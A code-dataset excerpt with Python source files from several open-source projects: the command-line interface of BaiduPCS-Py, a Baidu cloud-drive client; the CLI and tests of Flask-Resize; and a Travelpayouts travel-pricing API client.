如何获取 `bduss` 和 `cookies` 见 https://github.com/PeterDing/BaiduPCS-Py#%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7
用 `BaiduPCS-Py {{command}} --help` 查看具体的用法。"""
_ALIAS_DOC = "Command 别名:\n\n\b\n" + "\n".join(
[f"{alias: >3} : {cmd}" for alias, cmd in ALIAS.items()]
)
@click.group(cls=AliasedGroup, help=_APP_DOC, epilog=_ALIAS_DOC)
@click.option(
"--account-data", type=str, default=DEFAULT_DATA_PATH, help="Account data file"
)
@click.pass_context
def app(ctx, account_data):
ctx.obj.account_manager = AccountManager.load_data(account_data)
# Account
# {{{
@app.command()
@click.argument("user_id", type=int, default=None, required=False)
@click.pass_context
@handle_error
def who(ctx, user_id):
"""显示当前用户的信息
也可指定 `user_id`
"""
am = ctx.obj.account_manager
account = am.who(user_id)
if account:
display_user_info(account.user)
else:
print("[italic red]No recent user, please adding or selecting one[/]")
@app.command()
@click.argument("user_ids", type=int, nargs=-1, default=None, required=False)
@click.pass_context
@handle_error
def updateuser(ctx, user_ids):
"""更新用户信息 (默认更新当前用户信息)
也可指定多个 `user_id`
"""
am = ctx.obj.account_manager
if not user_ids:
user_ids = [am._who]
for user_id in user_ids:
am.update(user_id)
account = am.who(user_id)
display_user_info(account.user)
am.save()
@app.command()
@click.pass_context
@handle_error
def su(ctx):
"""切换当前用户"""
am = ctx.obj.account_manager
ls = sorted([(a.user, a.pwd) for a in am.accounts])
display_user_infos(*ls, recent_user_id=am._who)
indexes = list(str(idx) for idx in range(1, len(ls) + 1))
i = Prompt.ask("Select an user index", choices=indexes, default="")
if not i:
return
user_id = ls[int(i) - 1][0].user_id
am.su(user_id)
am.save()
@app.command()
@click.pass_context
@handle_error
def userlist(ctx):
"""显示所有用户"""
am = ctx.obj.account_manager
ls = sorted([(a.user, a.pwd) for a in am.accounts])
display_user_infos(*ls, recent_user_id=am._who)
@app.command()
@click.option("--bduss", prompt="bduss", hide_input=True, help="用户 bduss")
@click.option(
"--cookies", prompt="cookies", hide_input=True, default="", help="用户 cookies"
)
@click.pass_context
@handle_error
def useradd(ctx, bduss, cookies):
"""添加一个用户并设置为当前用户"""
if cookies:
cookies = dict([c.split("=", 1) for c in cookies.split("; ")])
else:
cookies = {}
account = Account.from_bduss(bduss, cookies=cookies)
am = ctx.obj.account_manager
am.useradd(account.user)
am.su(account.user.user_id)
am.save()
@app.command()
@click.pass_context
@handle_error
def userdel(ctx):
"""删除一个用户"""
am = ctx.obj.account_manager
ls = sorted([(a.user, a.pwd) for a in am.accounts])
display_user_infos(*ls, recent_user_id=am._who)
indexes = list(str(idx) for idx in range(1, len(ls) + 1))
i = Prompt.ask("Delete an user index", choices=indexes, default="")
if not i:
return
user_id = ls[int(i) - 1][0].user_id
am.userdel(user_id)
am.save()
print(f"Delete user {user_id}")
@app.command()
@click.argument("remotedir", type=str, default="/", required=False)
@click.pass_context
@handle_error
def cd(ctx, remotedir):
"""切换当前工作目录"""
am = ctx.obj.account_manager
am.cd(remotedir)
am.save()
@app.command()
@click.pass_context
@handle_error
def pwd(ctx):
"""显示当前工作目录"""
pwd = _pwd(ctx)
print(pwd)
# }}}
# Files
# {{{
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--desc", "-r", is_flag=True, help="逆序排列文件")
@click.option("--name", "-n", is_flag=True, help="依名字排序")
@click.option("--time", "-t", is_flag=True, help="依时间排序")
@click.option("--size", "-s", is_flag=True, help="依文件大小排序")
@click.option("--recursive", "-R", is_flag=True, help="递归列出文件")
@click.option("--include", "-I", type=str, help="筛选包含这个字符串的文件")
@click.option("--include-regex", "--IR", type=str, help="筛选包含这个正则表达式的文件")
@click.option("--exclude", "-E", type=str, help="筛选 不 包含这个字符串的文件")
@click.option("--exclude-regex", "--ER", type=str, help="筛选 不 包含这个正则表达式的文件")
@click.option("--is-file", "-f", is_flag=True, help="筛选 非 目录文件")
@click.option("--is-dir", "-d", is_flag=True, help="筛选目录文件")
@click.option("--no-highlight", "--NH", is_flag=True, help="取消匹配高亮")
@click.option("--show-size", "-S", is_flag=True, help="显示文件大小")
@click.option("--show-date", "-D", is_flag=True, help="显示文件创建时间")
@click.option("--show-md5", "-M", is_flag=True, help="显示文件md5")
@click.option("--show-absolute-path", "-A", is_flag=True, help="显示文件绝对路径")
@click.pass_context
@handle_error
def ls(
ctx,
remotepaths,
desc,
name,
time,
size,
recursive,
include,
include_regex,
exclude,
exclude_regex,
is_file,
is_dir,
no_highlight,
show_size,
show_date,
show_md5,
show_absolute_path,
):
"""列出网盘路径下的文件"""
api = _recent_api(ctx)
if not api:
return
sifters = []
if include:
sifters.append(IncludeSifter(include, regex=False))
if include_regex:
sifters.append(IncludeSifter(include, regex=True))
if exclude:
sifters.append(ExcludeSifter(exclude, regex=False))
if exclude_regex:
sifters.append(ExcludeSifter(exclude_regex, regex=True))
if is_file:
sifters.append(IsFileSifter())
if is_dir:
sifters.append(IsDirSifter())
pwd = _pwd(ctx)
remotepaths = (join_path(pwd, r) for r in list(remotepaths) or (pwd,))
list_files(
api,
*remotepaths,
desc=desc,
name=name,
time=time,
size=size,
recursive=recursive,
sifters=sifters,
highlight=not no_highlight,
show_size=show_size,
show_date=show_date,
show_md5=show_md5,
show_absolute_path=show_absolute_path,
)
@app.command()
@click.argument("keyword", nargs=1, type=str)
@click.argument("remotedir", nargs=1, type=str, default="")
@click.option("--recursive", "-R", is_flag=True, help="递归搜索文件")
@click.option("--include", "-I", type=str, help="筛选包含这个字符串的文件")
@click.option("--include-regex", "--IR", type=str, help="筛选包含这个正则表达式的文件")
@click.option("--exclude", "-E", type=str, help="筛选 不 包含这个字符串的文件")
@click.option("--exclude-regex", "--ER", type=str, help="筛选 不 包含这个正则表达式的文件")
@click.option("--is-file", "-f", is_flag=True, help="筛选 非 目录文件")
@click.option("--is-dir", "-d", is_flag=True, help="筛选目录文件")
@click.option("--no-highlight", "--NH", is_flag=True, help="取消匹配高亮")
@click.option("--show-size", "-S", is_flag=True, help="显示文件大小")
@click.option("--show-date", "-D", is_flag=True, help="显示文件创建时间")
@click.option("--show-md5", "-M", is_flag=True, help="显示文件md5")
@click.pass_context
@handle_error
def search(
ctx,
keyword,
remotedir,
recursive,
include,
include_regex,
exclude,
exclude_regex,
is_file,
is_dir,
no_highlight,
show_size,
show_date,
show_md5,
):
"""搜索包含 `keyword` 的文件"""
api = _recent_api(ctx)
if not api:
return
sifters = []
if include:
sifters.append(IncludeSifter(include, regex=False))
if include_regex:
sifters.append(IncludeSifter(include, regex=True))
if exclude:
sifters.append(ExcludeSifter(exclude, regex=False))
if exclude_regex:
sifters.append(ExcludeSifter(exclude_regex, regex=True))
if is_file:
sifters.append(IsFileSifter())
if is_dir:
sifters.append(IsDirSifter())
pwd = _pwd(ctx)
remotedir = join_path(pwd, remotedir)
_search(
api,
keyword,
remotedir,
recursive=recursive,
sifters=sifters,
highlight=not no_highlight,
show_size=show_size,
show_date=show_date,
show_md5=show_md5,
)
@app.command()
@click.argument("remotepath", nargs=1, type=str)
@click.option("--encoding", "-e", type=str, help="文件编码,默认自动解码")
@click.pass_context
@handle_error
def cat(ctx, remotepath, encoding):
"""显示文件内容"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotepath = join_path(pwd, remotepath)
_cat(api, remotepath, encoding=encoding)
@app.command()
@click.argument("remotedirs", nargs=-1, type=str)
@click.option("--show", "-S", is_flag=True, help="显示目录")
@click.pass_context
@handle_error
def mkdir(ctx, remotedirs, show):
"""创建目录"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotedirs = (join_path(pwd, d) for d in remotedirs)
file_operators.makedir(api, *remotedirs, show=show)
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--show", "-S", is_flag=True, help="显示结果")
@click.pass_context
@handle_error
def move(ctx, remotepaths, show):
"""移动文件
\b
examples:
move /file1 /file2 /to/dir
"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotepaths = [join_path(pwd, r) for r in remotepaths]
if len(remotepaths) < 2:
ctx.fail("remote paths < 2")
file_operators.move(api, *remotepaths, show=show)
@app.command()
@click.argument("source", nargs=1, type=str)
@click.argument("dest", nargs=1, type=str)
@click.option("--show", "-S", is_flag=True, help="显示结果")
@click.pass_context
@handle_error
def rename(ctx, source, dest, show):
"""文件重命名
\b
examples:
rename /path/to/far /to/here/foo
"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
source = join_path(pwd, source)
dest = join_path(pwd, dest)
file_operators.rename(api, source, dest, show=show)
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--show", "-S", is_flag=True, help="显示结果")
@click.pass_context
@handle_error
def copy(ctx, remotepaths, show):
"""拷贝文件
\b
examples:
copy /file1 /file2 /to/dir
"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotepaths = [join_path(pwd, r) for r in remotepaths]
if len(remotepaths) < 2:
ctx.fail("remote paths < 2")
file_operators.copy(api, *remotepaths, show=show)
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.pass_context
@handle_error
def remove(ctx, remotepaths):
"""删除文件"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotepaths = (join_path(pwd, r) for r in remotepaths)
file_operators.remove(api, *remotepaths)
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--outdir", "-o", nargs=1, type=str, default=".", help="指定下载本地目录,默认为当前目录")
@click.option("--recursive", "-R", is_flag=True, help="递归下载")
@click.option(
"--from-index", "-f", type=int, default=0, help="从所有目录中的第几个文件开始下载,默认为0(第一个)"
)
@click.option("--include", "-I", type=str, help="筛选包含这个字符串的文件")
@click.option("--include-regex", "--IR", type=str, help="筛选包含这个正则表达式的文件")
@click.option("--exclude", "-E", type=str, help="筛选 不 包含这个字符串的文件")
@click.option("--exclude-regex", "--ER", type=str, help="筛选 不 包含这个正则表达式的文件")
@click.option(
"-d",
"--downloader",
type=click.Choice([d.name for d in Downloader]),
default=DEFAULT_DOWNLOADER.name,
help="""指定下载应用
\b
默认为 me (BaiduPCS-Py 自己的下载器,支持断续下载)
me 使用多文件并发下载。
除 me 外,其他下载器,不使用多文件并发下载,使用一个文件多链接下载。
如果需要下载多个小文件推荐使用 me,如果需要下载少量大文件推荐使用其他下载器。
\b
aget_py (https://github.com/PeterDing/aget) 默认安装
aget_rs (下载 https://github.com/PeterDing/aget-rs/releases)
aria2 (下载 https://github.com/aria2/aria2/releases)
""",
)
@click.option(
"--concurrency",
"-s",
type=int,
default=DEFAULT_CONCURRENCY,
help="下载同步链接数,默认为5。数子越大下载速度越快,但是容易被百度封锁",
)
@click.option(
"--chunk-size", "-k", type=str, default=DEFAULT_CHUNK_SIZE, help="同步链接分块大小"
)
@click.option("--quiet", "-q", is_flag=True, help="取消第三方下载应用输出")
@click.option("--out-cmd", "--OC", is_flag=True, help="输出第三方下载应用命令")
@click.pass_context
@handle_error
def download(
ctx,
remotepaths,
outdir,
recursive,
from_index,
include,
include_regex,
exclude,
exclude_regex,
downloader,
concurrency,
chunk_size,
quiet,
out_cmd,
):
"""下载文件"""
if out_cmd:
assert downloader != Downloader.me.name, "输出命令只能用于第三方下载应用"
api = _recent_api(ctx)
if not api:
return
sifters = []
if include:
sifters.append(IncludeSifter(include, regex=False))
if include_regex:
sifters.append(IncludeSifter(include, regex=True))
if exclude:
sifters.append(ExcludeSifter(exclude, regex=False))
if exclude_regex:
sifters.append(ExcludeSifter(exclude_regex, regex=True))
pwd = _pwd(ctx)
remotepaths = [join_path(pwd, r) for r in remotepaths]
_download(
api,
remotepaths,
outdir,
sifters=sifters,
recursive=recursive,
from_index=from_index,
downloader=getattr(Downloader, downloader),
downloadparams=DownloadParams(
concurrency=concurrency, chunk_size=chunk_size, quiet=quiet
),
out_cmd=out_cmd,
)
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--recursive", "-R", is_flag=True, help="递归播放")
@click.option(
"--from-index", "-f", type=int, default=0, help="从所有目录中的第几个文件开始播放,默认为0(第一个)"
)
@click.option("--include", "-I", type=str, help="筛选包含这个字符串的文件")
@click.option("--include-regex", "--IR", type=str, help="筛选包含这个正则表达式的文件")
@click.option("--exclude", "-E", type=str, help="筛选 不 包含这个字符串的文件")
@click.option("--exclude-regex", "--ER", type=str, help="筛选 不 包含这个正则表达式的文件")
@click.option(
"-p",
"--player",
type=click.Choice([d.name for d in Player]),
default=DEFAULT_PLAYER.name,
help="""指定第三方播放器
\b
默认为 mpv (https://mpv.io),
""",
)
@click.option("--player-params", "--PP", multiple=True, type=str, help="第三方播放器参数")
@click.option("--m3u8", "-m", is_flag=True, help="获取m3u8文件并播放")
@click.option("--quiet", "-q", is_flag=True, help="取消第三方播放器输出")
@click.option("--out-cmd", "--OC", is_flag=True, help="输出第三方播放器命令")
@click.pass_context
@handle_error
def play(
ctx,
remotepaths,
recursive,
from_index,
include,
include_regex,
exclude,
exclude_regex,
player,
player_params,
m3u8,
quiet,
out_cmd,
):
"""播放媒体文件"""
api = _recent_api(ctx)
if not api:
return
sifters = []
if include:
sifters.append(IncludeSifter(include, regex=False))
if include_regex:
sifters.append(IncludeSifter(include, regex=True))
if exclude:
sifters.append(ExcludeSifter(exclude, regex=False))
if exclude_regex:
sifters.append(ExcludeSifter(exclude_regex, regex=True))
pwd = _pwd(ctx)
remotepaths = [join_path(pwd, r) for r in remotepaths]
_play(
api,
remotepaths,
sifters=sifters,
recursive=recursive,
from_index=from_index,
player=getattr(Player, player),
player_params=player_params,
m3u8=m3u8,
quiet=quiet,
out_cmd=out_cmd,
)
@app.command()
@click.argument("localpaths", nargs=-1, type=str)
@click.argument("remotedir", nargs=1, type=str)
@click.option("--max-workers", "-w", type=int, default=CPU_NUM, help="同时上传文件数")
@click.option("--no-ignore-existing", "--NI", is_flag=True, help="上传已经存在的文件")
@click.option("--no-show-progress", "--NP", is_flag=True, help="不显示上传进度")
@click.pass_context
@handle_error
def upload(
ctx, localpaths, remotedir, max_workers, no_ignore_existing, no_show_progress
):
"""上传文件"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotedir = join_path(pwd, remotedir)
from_to_list = from_tos(localpaths, remotedir)
_upload(
api,
from_to_list,
max_workers=max_workers,
ignore_existing=not no_ignore_existing,
show_progress=not no_show_progress,
)
@app.command()
@click.argument("localdir", nargs=1, type=str)
@click.argument("remotedir", nargs=1, type=str)
@click.option("--max-workers", "-w", type=int, default=CPU_NUM, help="同时上传文件数")
@click.option("--no-show-progress", "--NP", is_flag=True, help="不显示上传进度")
@click.pass_context
@handle_error
def sync(ctx, localdir, remotedir, max_workers, no_show_progress):
"""同步本地目录到远端"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotedir = join_path(pwd, remotedir)
_sync(
api,
localdir,
remotedir,
max_workers=max_workers,
show_progress=not no_show_progress,
)
# }}}
# Share
# {{{
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--password", "-p", type=str, help="设置秘密,4个字符。默认没有秘密")
@click.pass_context
@handle_error
def share(ctx, remotepaths, password):
"""分享文件
\b
examples:
share /path1 path2
"""
assert not password or len(password) == 4, "`password` must be 4 letters"
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotepaths = (join_path(pwd, r) for r in remotepaths)
_share.share_files(api, *remotepaths, password=password)
@app.command()
@click.option("--show-all", "-S", is_flag=True, help="显示所有分享的链接,默认只显示有效的分享链接")
@click.pass_context
@handle_error
def shared(ctx, show_all):
"""列出分享链接"""
api = _recent_api(ctx)
if not api:
return
_share.list_shared(api, show_all=show_all)
@app.command()
@click.argument("share_ids", nargs=-1, type=int)
@click.pass_context
@handle_error
def cancelshared(ctx, share_ids):
"""取消分享链接"""
api = _recent_api(ctx)
if not api:
return
_share.cancel_shared(api, *share_ids)
@app.command()
@click.argument("shared_url", nargs=1, type=str)
@click.argument("remotedir", nargs=1, type=str)
@click.option("--password", "-p", type=str, help="链接密码,如果没有不用设置")
@click.option("--no-show-vcode", "--NV", is_flag=True, help="不显示验证码")
@click.pass_context
@handle_error
def save(ctx, shared_url, remotedir, password, no_show_vcode):
"""保存其他用户分享的链接"""
assert not password or len(password) == 4, "`password` must be 4 letters"
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotedir = join_path(pwd, remotedir)
_share.save_shared(
api,
shared_url,
remotedir,
password=password,
show_vcode=not no_show_vcode,
)
# }}}
# Cloud
# {{{
@app.command()
@click.argument("task_urls", nargs=-1, type=str)
@click.argument("remotedir", nargs=1, type=str)
@click.pass_context
@handle_error
def add(ctx, task_urls, remotedir):
"""添加离线下载任务"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotedir = join_path(pwd, remotedir)
for url in task_urls:
_cloud.add_task(api, url, remotedir)
@app.command()
@click.argument("task_ids", nargs=-1, type=str)
@click.pass_context
@handle_error
def tasks(ctx, task_ids):
"""列出离线下载任务。也可列出给定id的任务"""
api = _recent_api(ctx)
if not api:
return
if not task_ids:
_cloud.list_tasks(api)
else:
_cloud.tasks(api, *task_ids)
@app.command()
@click.pass_context
@handle_error
def cleartasks(ctx):
"""清除已经下载完和下载失败的任务"""
api = _recent_api(ctx)
if not api:
return
_cloud.clear_tasks(api)
@app.command()
@click.argument("task_ids", nargs=-1, type=str)
@click.pass_context
@handle_error
def canceltasks(ctx, task_ids):
"""取消下载任务"""
api = _recent_api(ctx)
if not api:
return
for task_id in task_ids:
_cloud.cancel_task(api, task_id)
@app.command()
@click.option("--yes", is_flag=True, help="确定直接运行")
@click.pass_context
@handle_error
def purgetasks(ctx, yes):
"""删除所有离线下载任务"""
api = _recent_api(ctx)
if not api:
return
if not yes:
if not Confirm.ask("确定删除[i red]所有的[/i red]离线下载任务?", default=False):
return
_cloud.purge_all_tasks(api)
# }}}
``` |
{
"source": "jokerinteractive/Flask-Resize",
"score": 3
} |
#### File: Flask-Resize/flask_resize/bin.py
```python
import os
import argh
import flask_resize
config = flask_resize.configuration.Config.from_pyfile(
os.environ["FLASK_RESIZE_CONF"]
)
resize = flask_resize.make_resizer(config)
@argh.named("images")
def clear_images():
"""Delete all generated images from the storage backend"""
for filepath in resize.storage_backend.delete_tree(
resize.target_directory
):
yield filepath
@argh.named("cache")
def list_cache():
"""List all items found in cache"""
for key in resize.cache_store.all():
yield key
@argh.named("images")
def list_images():
"""List all generated images found in storage backend"""
for key in resize.storage_backend.list_tree(resize.target_directory):
yield key
@argh.named("cache")
def sync_cache():
"""
Syncs paths stored in the cache backend with what's in the storage backend
Useful when the storage backend destination is shared between multiple
environments. One use case is when one has synced generated imagery
from production into one's development environment (for example with
`aws s3 sync --delete s3://prod-bucket s3://my-dev-bucket`).
The cache can then be synced with what's been added/removed from the
bucket `my-dev-bucket`.
"""
generated_image_paths = set(
resize.storage_backend.list_tree(resize.target_directory)
)
cached_paths = set(resize.cache_store.all())
for path in cached_paths - generated_image_paths:
resize.cache_store.remove(path)
yield "Removed {}".format(path)
for path in generated_image_paths - cached_paths:
resize.cache_store.add(path)
yield "Added {}".format(path)
@argh.named("cache")
def clear_cache():
"""Clear the cache backend from generated images' paths"""
resize.cache_store.clear()
@argh.named("all")
def clear_all():
"""Clear both the cache and all generated images"""
clear_cache()
for filepath in clear_images():
yield filepath
@argh.arg("-f", "--format")
@argh.arg("-F", "--fill")
def generate(
filename,
dimensions=None,
format=None,
quality=80,
fill=False,
bgcolor=None,
upscale=True,
progressive=True,
placeholder=False,
):
"""
Generate images passed in through stdin. Return URL for resulting image
Useful to generate images outside of the regular request/response cycle
of a web app = happier visitors who don't have to wait until image
processing by Flask-Resize completes. Care has to be taken so that the
exact same arguments are passed in as what is specified in
code/templates - the smallest difference in passed in options will cause
flask resize to generate a new image.
Use GNU Parallel or similar tool to parallelize the generation
"""
return resize(
filename,
dimensions=dimensions,
format=format,
quality=quality,
fill=fill,
bgcolor=bgcolor,
upscale=upscale,
progressive=progressive,
placeholder=placeholder,
)
parser = argh.ArghParser()
argh.add_commands(parser, [generate])
argh.add_commands(
parser,
[list_cache, list_images],
namespace="list",
title="Commands for listing images and cache",
)
argh.add_commands(
parser,
[sync_cache],
namespace="sync",
title="Commands for syncing data",
)
argh.add_commands(
parser,
[clear_cache, clear_images, clear_all],
namespace="clear",
title="Commands for clearing/deleting images and cache",
)
```
#### File: Flask-Resize/tests/test_bin.py
```python
import os
import subprocess
import pytest
import flask_resize
from .decorators import requires_redis, slow
@pytest.fixture
def env(tmpdir, redis_cache):
basedir = tmpdir
conffile = tmpdir.join("flask-resize-conf.py")
conffile.write(
"""
RESIZE_URL = 'https://example.com'
RESIZE_ROOT = '{root}'
RESIZE_REDIS_HOST = '{redis_host}'
RESIZE_REDIS_KEY = '{cache_key}'
""".format(
root=str(basedir).replace("\\", "\\\\"),
redis_host=redis_cache._host,
cache_key=redis_cache.key,
).strip()
)
env = os.environ.copy()
# env = dict(PATH=os.environ['PATH'])
env.update(FLASK_RESIZE_CONF=str(conffile))
return env
def run(env, *args):
return subprocess.check_output(args, env=env).decode().splitlines()
@slow
def test_bin_usage(env):
assert "usage: flask-resize" in run(env, "flask-resize", "--help")[0]
@slow
def test_bin_list_images_empty(env):
assert run(env, "flask-resize", "list", "images") == []
@slow
def test_bin_list_has_images(
env, resizetarget_opts, image1_name, image1_data, image1_key
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
assert run(env, "flask-resize", "list", "images") == [image1_key]
@requires_redis
@slow
def test_bin_list_cache_empty(env, redis_cache):
assert run(env, "flask-resize", "list", "cache") == []
@requires_redis
@slow
def test_bin_list_has_cache(env, redis_cache):
redis_cache.add("hello")
redis_cache.add("buh-bye")
assert set(run(env, "flask-resize", "list", "cache")) == {
"hello",
"buh-bye",
}
@slow
def test_bin_clear_images(env, resizetarget_opts, image1_name, image1_data):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
run(env, "flask-resize", "clear", "images")
assert run(env, "flask-resize", "list", "images") == []
@requires_redis
@slow
def test_bin_clear_cache(env, redis_cache):
redis_cache.add("foo bar")
assert run(env, "flask-resize", "clear", "cache") == []
@requires_redis
@slow
def test_bin_sync_cache(
env, resizetarget_opts, image1_name, image1_data, image1_key, redis_cache
):
resize_target = flask_resize.ResizeTarget(**resizetarget_opts)
resize_target.image_store.save(image1_name, image1_data)
resize_target.generate()
redis_cache.clear()
assert run(env, "flask-resize", "list", "cache") == []
run(env, "flask-resize", "sync", "cache")
assert run(env, "flask-resize", "list", "images") == [image1_key]
```
#### File: Flask-Resize/tests/test_resize.py
```python
import io
import re
import flask
import pytest
from PIL import Image
from flask_resize import cache, exc, resizing
from .base import create_resizeapp
from .decorators import requires_cairosvg, requires_no_cairosvg
def test_resizetarget_init(filestorage):
original_image_relative_url = "path/to/my/file.png"
target = resizing.ResizeTarget(
filestorage,
original_image_relative_url,
dimensions="100x50",
format="jpeg",
quality=80,
fill=False,
bgcolor=None,
upscale=True,
progressive=True,
use_placeholder=False,
cache_store=cache.NoopCache(),
)
assert target.name_hashing_method == "sha1"
assert target.target_directory == "resized-images"
assert target._get_generate_unique_key_args() == [
original_image_relative_url,
"JPEG",
80,
100,
50,
"",
"no-fill",
"upscale",
"",
]
assert (
target.unique_key
== "resized-images/e1/30/7a6b8f166778588914d5130bd92bcd7f20ca.jpg"
)
def test_resizetarget_generate(
resizetarget_opts, image1_data, image1_name, image1_key
):
resize_target = resizing.ResizeTarget(**resizetarget_opts)
assert resize_target.name_hashing_method == "sha1"
with pytest.raises(exc.CacheMiss):
resize_target.get_cached_path()
with pytest.raises(exc.ImageNotFoundError):
assert resize_target.get_path()
# Save original file
resize_target.image_store.save(image1_name, image1_data)
# Generate thumb
resize_target.generate()
assert resize_target.get_path() == image1_key
def test_resizetarget_generate_placeholder(resizetarget_opts, image1_data):
resize_target = resizing.ResizeTarget(**resizetarget_opts)
resize_target.use_placeholder = True
resize_target.generate()
assert re.match(r"^resized-images/.+\.jpg$", resize_target.get_path())
def test_resize_filter(tmpdir, image1_data, image2_data):
resize_url = "http://test.dev/"
file1 = tmpdir.join("file1.png")
file1.write_binary(image1_data)
file2 = tmpdir.join("file2.png")
file2.write_binary(image2_data)
file1_expected_url = (
resize_url
+ "resized-images/ac/17/b732cabcc4eeb783cd994d0e169665b3bb68.png"
)
file2_expected_url = (
resize_url
+ "resized-images/ad/d9/a8c8531825a56f58289087b1f892c5e1348f.png"
)
app = create_resizeapp(
RESIZE_URL=resize_url, RESIZE_ROOT=str(tmpdir), DEBUG=True
)
template = '<img src="{{ fn|resize("100x") }}">'
@app.route("/")
def start():
return flask.render_template_string(template, fn="file1.png")
with app.test_client() as c:
resp = c.get("/")
assert file1_expected_url in resp.get_data(True)
with app.test_request_context():
rendered = flask.render_template_string(template, fn="file2.png")
assert file2_expected_url in rendered
def test_fill_dimensions(tmpdir, image1_data, resizetarget_opts):
file1 = tmpdir.join("file1.png")
file1.write_binary(image1_data)
resizetarget_opts.update(
format="png",
source_image_relative_url="file1.png",
dimensions="300x400",
fill=True,
)
resize_target = resizing.ResizeTarget(**resizetarget_opts)
img_data = resize_target.generate()
generated_img = Image.open(io.BytesIO(img_data))
assert generated_img.width == 300
assert generated_img.height == 400
assert generated_img.getpixel((0, 0))[3] == 0 # Transparent
resizetarget_opts.update(dimensions="700x600")
resize_target = resizing.ResizeTarget(**resizetarget_opts)
img_data = resize_target.generate()
generated_img = Image.open(io.BytesIO(img_data))
assert generated_img.width == 700
assert generated_img.height == 600
assert generated_img.getpixel((0, 0))[3] == 0 # Transparent
SVG_DATA = """<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg
width="100px"
height="100px"
viewBox="0 0 100 100"
version="1.1"
xmlns="http://www.w3.org/2000/svg"
xmlns:xlink="http://www.w3.org/1999/xlink">
<defs></defs>
<rect
id="Rectangle"
fill="#000000"
x="0"
y="0"
width="100"
height="100"></rect>
</svg>"""
@requires_cairosvg
def test_svg_resize(tmpdir, resizetarget_opts):
svg_path = tmpdir.join("test.svg")
svg_path.write(SVG_DATA)
resizetarget_opts.update(
format="png",
source_image_relative_url="test.svg",
dimensions="50x50",
)
resize_target = resizing.ResizeTarget(**resizetarget_opts)
img_data = resize_target.generate()
img = Image.open(io.BytesIO(img_data))
assert img.width == 50
assert img.height == 50
expected = (0, 0, 0, 255)
assert img.getpixel((0, 0)) == expected
assert img.getpixel((49, 49)) == expected
@requires_no_cairosvg
def test_svg_resize_cairosvgimporterror(tmpdir, resizetarget_opts):
svg_path = tmpdir.join("test.svg")
svg_path.write("content")
resizetarget_opts.update(source_image_relative_url="test.svg")
resize_target = resizing.ResizeTarget(**resizetarget_opts)
with pytest.raises(exc.CairoSVGImportError):
resize_target.generate()
``` |
{
"source": "jokerinteractive/travelpayouts-python",
"score": 3
} |
#### File: travelpayouts-python/travelpayouts/client.py
```python
import functools
import requests
from urllib.parse import urlencode
from travelpayouts.exceptions import ApiError
class Client(object):
"""Performs requests to the Travel Payouts API."""
def __init__(self, token=None, marker=None):
"""
:param token: Travel Payouts API token
:type token: string
:param marker: The unique identifier of the affiliate
:type marker: string
"""
self.token = token
self.marker = marker
self.default_headers = {
'Accept': 'application/json',
'Accept-Encoding': 'gzip,deflate,sdch',
'Content-Type': 'application/json',
'X-Access-Token': self.token
}
def _get(self, url, params=None):
full_url = url + '?' + urlencode(params) if params else url
r = requests.get(full_url, headers=self.default_headers)
return r.json()
def _post(self, url, params=None, json=None):
full_url = url + '?' + urlencode(params) if params else url
r = requests.post(full_url, headers=self.default_headers, json=json)
if not r.ok:
raise ApiError(r.status_code, r.text)
return r.json()
from travelpayouts.common import whereami
from travelpayouts.common import countries
from travelpayouts.common import cities
from travelpayouts.common import airports
from travelpayouts.common import airlines
from travelpayouts.common import airlines_alliances
from travelpayouts.common import planes
from travelpayouts.common import routes
from travelpayouts.v2 import prices_latest
from travelpayouts.v2 import month_matrix
from travelpayouts.v2 import week_matrix
from travelpayouts.v2 import nearest_places_matrix
from travelpayouts.v1 import prices_cheap
from travelpayouts.v1 import prices_direct
from travelpayouts.v1 import prices_calendar
from travelpayouts.v1 import airline_directions
from travelpayouts.v1 import city_directions
from travelpayouts.flights import search
from travelpayouts.flights import search_results
from travelpayouts.flights import get_link
def make_api_method(func):
"""
Provides a single entry point for modifying all API methods.
For now this is limited to allowing the client object to be modified
with an `extra_params` keyword arg to each method, that is then used
as the params for each web service request.
Please note that this is an unsupported feature for advanced use only.
It's also currently incompatibile with multiple threads, see GH #160.
"""
@functools.wraps(func)
def wrapper(*args, **kwargs):
args[0]._extra_params = kwargs.pop("extra_params", None)
result = func(*args, **kwargs)
try:
del args[0]._extra_params
except AttributeError:
pass
return result
return wrapper
Client.whereami = make_api_method(whereami)
Client.countries = make_api_method(countries)
Client.cities = make_api_method(cities)
Client.airports = make_api_method(airports)
Client.airlines = make_api_method(airlines)
Client.airlines_alliances = make_api_method(airlines_alliances)
Client.planes = make_api_method(planes)
Client.routes = make_api_method(routes)
Client.prices_latest = make_api_method(prices_latest)
Client.month_matrix = make_api_method(month_matrix)
Client.week_matrix = make_api_method(week_matrix)
Client.nearest_places_matrix = make_api_method(nearest_places_matrix)
Client.prices_cheap = make_api_method(prices_cheap)
Client.prices_direct = make_api_method(prices_direct)
Client.prices_calendar = make_api_method(prices_calendar)
Client.airline_directions = make_api_method(airline_directions)
Client.city_directions = make_api_method(city_directions)
Client.search = make_api_method(search)
Client.search_results = make_api_method(search_results)
Client.get_link = make_api_method(get_link)
```
